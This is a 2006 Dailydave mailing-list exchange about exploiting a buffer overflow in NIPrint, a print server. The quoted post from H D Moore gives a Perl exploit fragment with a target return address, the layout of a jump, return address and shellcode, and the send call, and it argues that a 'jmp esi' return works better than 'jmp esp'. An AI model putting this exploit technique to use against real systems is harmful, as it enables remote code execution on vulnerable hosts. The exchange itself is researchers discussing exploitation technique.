Re: [Dailydave] VisualSploit redux
From: Bas Alberts (bas.alberts@immunitysec.com)
Date: Tue May 23 2006 - 19:40:43 CDT
Thank god the VS demo buffer is also compatible with jmp esi targets... we
must've gotten that right by accident! :D:D
Thanks HD :D
Love,
Bas
On Tue, May 23, 2006 at 05:35:38PM -0500, H D Moore wrote:
> On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> > Anyways, there's a movie here:
> > http://www.immunitysec.com/documentation/vs_niprint.html
>
> Not to nitpick, but there is a better way to exploit this bug:
>
> 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],
>
> my $req = Pex::Text::AlphaNumText(8192);
> substr($req, 0, 2, "\xeb\x33");
> substr($req, 49, 4, pack('V', $target->[1]));
> substr($req, 53, length($shellcode), $shellcode);
> $s->Send($req);
>
> This will return to a "jmp %esi", where %esi points to the source string
> before the memory overwrite. The benefits of this vs the "jmp %esp":
> * Our code isn't running so close to ESP (easy to fix w/prepend)
> * More room for the actual payload (could even embed the ret)
> * The return address will work regardless of OS/SP combo
>
> Fun stuff, keep up the demos :-)
>
> -HD